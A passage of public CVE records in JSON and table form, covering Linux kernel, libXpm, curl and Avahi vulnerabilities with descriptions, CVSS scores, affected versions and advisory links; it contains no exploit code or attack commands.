"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "NULL Pointer Dereference", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-15T17:05:42.984Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2950", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2950" }, { "name": "RHSA-2024:3138", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:3138" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-42754" }, { "name": "RHBZ#2239845", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2239845" }, { "url": "https://seclists.org/oss-sec/2023/q4/14" } ], "timeline": [ { "lang": "en", "time": "2023-09-13T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-09-17T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: ipv4: null pointer dereference in ipv4_send_dest_unreach()", "workarounds": [ { "lang": "en", "value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability." } ], "x_redhatCweChain": "CWE-476: NULL Pointer Dereference" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-42754", "datePublished": "2023-10-05T18:25:22.372Z", "dateReserved": "2023-09-13T11:03:47.962Z", "dateUpdated": "2024-11-15T17:05:42.984Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-39198
Vulnerability from cvelistv5
Published
2023-11-09 19:15
Modified
2024-11-15 17:03
Severity ?
EPSS score ?
Summary
A race condition was found in the QXL driver in the Linux kernel. The qxl_mode_dumb_create() function dereferences the qobj returned by the qxl_gem_object_create_with_handle(), but the handle is the only one holding a reference to it. This flaw allows an attacker to guess the returned handle value and trigger a use-after-free issue, potentially leading to a denial of service or privilege escalation.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:2394 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2950 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:3138 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-39198 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2218332 | issue-tracking, x_refsource_REDHAT |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | Red Hat | Red Hat Enterprise Linux 8 |
Unaffected: 0:4.18.0-553.rt7.342.el8_10 < * cpe:/a:redhat:enterprise_linux:8::nfv cpe:/a:redhat:enterprise_linux:8::realtime |
||||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2023-39198", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "total" } ], "role": "CISA Coordinator", "timestamp": "2024-08-01T03:55:52.570322Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-08-01T13:53:12.378Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T18:02:05.368Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2950", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2950" }, { "name": "RHSA-2024:3138", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:3138" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-39198" }, { "name": "RHBZ#2218332", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2218332" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::nfv", "cpe:/a:redhat:enterprise_linux:8::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.rt7.342.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::crb", "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::nfv" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::nfv" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "datePublic": "2023-08-17T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A race condition was found in the QXL driver in the Linux kernel. The qxl_mode_dumb_create() function dereferences the qobj returned by the qxl_gem_object_create_with_handle(), but the handle is the only one holding a reference to it. This flaw allows an attacker to guess the returned handle value and trigger a use-after-free issue, potentially leading to a denial of service or privilege escalation." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-15T17:03:59.899Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2950", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2950" }, { "name": "RHSA-2024:3138", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:3138" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-39198" }, { "name": "RHBZ#2218332", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2218332" } ], "timeline": [ { "lang": "en", "time": "2023-06-28T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-08-17T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: qxl: race condition leading to use-after-free in qxl_mode_dumb_create()", "workarounds": [ { "lang": "en", "value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability." } ], "x_redhatCweChain": "CWE-362-\u003eCWE-416: Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027) leads to Use After Free" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-39198", "datePublished": "2023-11-09T19:15:47.605Z", "dateReserved": "2023-07-25T17:04:34.810Z", "dateUpdated": "2024-11-15T17:03:59.899Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-45863
Vulnerability from cvelistv5
Published
2023-10-14 00:00
Modified
2024-08-02 20:29
Severity ?
EPSS score ?
Summary
An issue was discovered in lib/kobject.c in the Linux kernel before 6.2.3. With root access, an attacker can trigger a race condition that results in a fill_kobj_path out-of-bounds write.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T20:29:32.476Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3bb2a01caa813d3a1845d378bbe4169ef280d394" }, { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.2.3" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3710-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3711-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in lib/kobject.c in the Linux kernel before 6.2.3. With root access, an attacker can trigger a race condition that results in a fill_kobj_path out-of-bounds write." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-11T21:06:37.809590", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3bb2a01caa813d3a1845d378bbe4169ef280d394" }, { "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.2.3" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3710-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3711-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-45863", "datePublished": "2023-10-14T00:00:00", "dateReserved": "2023-10-14T00:00:00", "dateUpdated": "2024-08-02T20:29:32.476Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-43788
Vulnerability from cvelistv5
Published
2023-10-10 12:26
Modified
2024-11-23 02:03
Severity ?
EPSS score ?
Summary
A vulnerability was found in libXpm due to a boundary condition within the XpmCreateXpmImageFromBuffer() function. This flaw allows a local attacker to trigger an out-of-bounds read error and read the contents of memory on the system.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:2146 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2217 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2974 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:3022 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-43788 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2242248 | issue-tracking, x_refsource_REDHAT |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ |
Version: 0 ≤ |
||||||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T19:52:11.310Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:2146", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2146" }, { "name": "RHSA-2024:2217", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2217" }, { "name": "RHSA-2024:2974", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2974" }, { "name": "RHSA-2024:3022", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:3022" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-43788" }, { "name": "RHBZ#2242248", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242248" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/63IBRFLQVZSMOAZBZOBKFWJP26ILRAGQ/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I3KFUQT42R7TB4D7RISNSBQFJGLTQGUL/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFAJTBNO3PAIA6EGZR4PN62H6RLKNDTE/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6FARGWN7VWXXWPXYNEEDJLRR3EWFZ3T/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZECBCLDYUGLDSVV75ECPIBW7JXOB3747/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://gitlab.freedesktop.org/xorg/lib/libxpm", "defaultStatus": "unaffected", "packageName": "libXpm", "versions": [ { "lessThan": "3.5.17", "status": "affected", "version": "0", "versionType": "semver" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::appstream" ], "defaultStatus": "affected", "packageName": "libXpm", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:3.5.12-11.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::appstream" ], "defaultStatus": "affected", "packageName": "motif", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:2.3.4-20.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "libXpm", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:3.5.13-10.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "motif", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:2.3.4-28.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "libXpm", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "libXpm", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "motif", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" } ], "datePublic": "2023-10-04T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A vulnerability was found in libXpm due to a boundary condition within the XpmCreateXpmImageFromBuffer() function. This flaw allows a local attacker to trigger an out-of-bounds read error and read the contents of memory on the system." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-125", "description": "Out-of-bounds Read", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-23T02:03:08.274Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:2146", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2146" }, { "name": "RHSA-2024:2217", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2217" }, { "name": "RHSA-2024:2974", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2974" }, { "name": "RHSA-2024:3022", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:3022" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-43788" }, { "name": "RHBZ#2242248", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242248" } ], "timeline": [ { "lang": "en", "time": "2023-10-05T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-10-04T00:00:00+00:00", "value": "Made public." } ], "title": "Libxpm: out of bounds read in xpmcreatexpmimagefrombuffer()", "x_redhatCweChain": "CWE-125: Out-of-bounds Read" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-43788", "datePublished": "2023-10-10T12:26:08.737Z", "dateReserved": "2023-09-22T09:52:31.109Z", "dateUpdated": "2024-11-23T02:03:08.274Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-46218
Vulnerability from cvelistv5
Published
2023-12-07 01:10
Modified
2024-08-02 20:37
Severity ?
EPSS score ?
Summary
This flaw allows a malicious HTTP server to set "super cookies" in curl that
are then passed back to more origins than what is otherwise allowed or
possible. This allows a site to set cookies that then would get sent to
different and unrelated sites and domains.
It could do this by exploiting a mixed case flaw in curl's function that
verifies a given cookie domain against the Public Suffix List (PSL). For
example a cookie could be set with `domain=co.UK` when the URL used a lower
case hostname `curl.co.uk`, even though `co.uk` is listed as a PSL domain.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T20:37:40.148Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://hackerone.com/reports/2212193" }, { "tags": [ "x_transferred" ], "url": "https://curl.se/docs/CVE-2023-46218.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3ZX3VW67N4ACRAPMV2QS2LVYGD7H2MVE/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UOGXU25FMMT2X6UUITQ7EZZYMJ42YWWD/" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00015.html" }, { "tags": [ "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5587" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240125-0007/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "curl", "vendor": "curl", "versions": [ { "lessThanOrEqual": "8.4.0", "status": "affected", "version": "8.4.0", "versionType": "semver" }, { "lessThan": "7.46.0", "status": "unaffected", "version": "7.46.0", "versionType": "semver" } ] } ], "descriptions": [ { "lang": "en", "value": "This flaw allows a malicious HTTP server to set \"super cookies\" in curl that\nare then passed back to more origins than what is otherwise allowed or\npossible. This allows a site to set cookies that then would get sent to\ndifferent and unrelated sites and domains.\n\nIt could do this by exploiting a mixed case flaw in curl\u0027s function that\nverifies a given cookie domain against the Public Suffix List (PSL). For\nexample a cookie could be set with `domain=co.UK` when the URL used a lower\ncase hostname `curl.co.uk`, even though `co.uk` is listed as a PSL domain.\n" } ], "providerMetadata": { "dateUpdated": "2023-12-07T01:10:34.846Z", "orgId": "36234546-b8fa-4601-9d6f-f4e334aa8ea1", "shortName": "hackerone" }, "references": [ { "url": "https://hackerone.com/reports/2212193" }, { "url": "https://curl.se/docs/CVE-2023-46218.html" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3ZX3VW67N4ACRAPMV2QS2LVYGD7H2MVE/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UOGXU25FMMT2X6UUITQ7EZZYMJ42YWWD/" }, { "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00015.html" }, { "url": "https://www.debian.org/security/2023/dsa-5587" }, { "url": "https://security.netapp.com/advisory/ntap-20240125-0007/" } ] } }, "cveMetadata": { "assignerOrgId": "36234546-b8fa-4601-9d6f-f4e334aa8ea1", "assignerShortName": "hackerone", "cveId": "CVE-2023-46218", "datePublished": "2023-12-07T01:10:34.846Z", "dateReserved": "2023-10-19T01:00:12.854Z", "dateUpdated": "2024-08-02T20:37:40.148Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-0480
Vulnerability from cvelistv5
Published
2022-08-29 14:03
Modified
2024-08-02 23:32
Severity ?
EPSS score ?
Summary
A flaw was found in the filelock_init in fs/locks.c function in the Linux kernel. This issue can lead to host memory exhaustion due to memcg not limiting the number of Portable Operating System Interface (POSIX) file locks.
References
▼ | URL | Tags |
---|---|---|
https://github.com/kata-containers/kata-containers/issues/3373 | x_refsource_MISC | |
https://lore.kernel.org/linux-mm/20210902215519.AWcuVc3li%25akpm%40linux-foundation.org/ | x_refsource_MISC | |
https://bugzilla.redhat.com/show_bug.cgi?id=2049700 | x_refsource_MISC | |
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0f12156dff2862ac54235fc72703f18770769042 | x_refsource_MISC | |
https://access.redhat.com/security/cve/CVE-2022-0480 | x_refsource_MISC | |
https://ubuntu.com/security/CVE-2022-0480 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T23:32:46.033Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/kata-containers/kata-containers/issues/3373" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://lore.kernel.org/linux-mm/20210902215519.AWcuVc3li%25akpm%40linux-foundation.org/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2049700" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0f12156dff2862ac54235fc72703f18770769042" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2022-0480" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ubuntu.com/security/CVE-2022-0480" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Not Known" } ] } ], "descriptions": [ { "lang": "en", "value": "A flaw was found in the filelock_init in fs/locks.c function in the Linux kernel. This issue can lead to host memory exhaustion due to memcg not limiting the number of Portable Operating System Interface (POSIX) file locks." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-770", "description": "CWE-770 - Allocation of Resources Without Limits or Throttling.", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-08-29T14:03:03", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/kata-containers/kata-containers/issues/3373" }, { "tags": [ "x_refsource_MISC" ], "url": "https://lore.kernel.org/linux-mm/20210902215519.AWcuVc3li%25akpm%40linux-foundation.org/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2049700" }, { "tags": [ "x_refsource_MISC" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0f12156dff2862ac54235fc72703f18770769042" }, { "tags": [ "x_refsource_MISC" ], "url": "https://access.redhat.com/security/cve/CVE-2022-0480" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ubuntu.com/security/CVE-2022-0480" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-0480", "datePublished": "2022-08-29T14:03:04", "dateReserved": "2022-02-02T00:00:00", "dateUpdated": "2024-08-02T23:32:46.033Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-38472
Vulnerability from cvelistv5
Published
2023-11-02 14:59
Modified
2024-08-29 14:17
Severity ?
EPSS score ?
Summary
A vulnerability was found in Avahi. A reachable assertion exists in the avahi_rdata_parse() function.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/security/cve/CVE-2023-38472 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2191692 | issue-tracking, x_refsource_REDHAT |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||
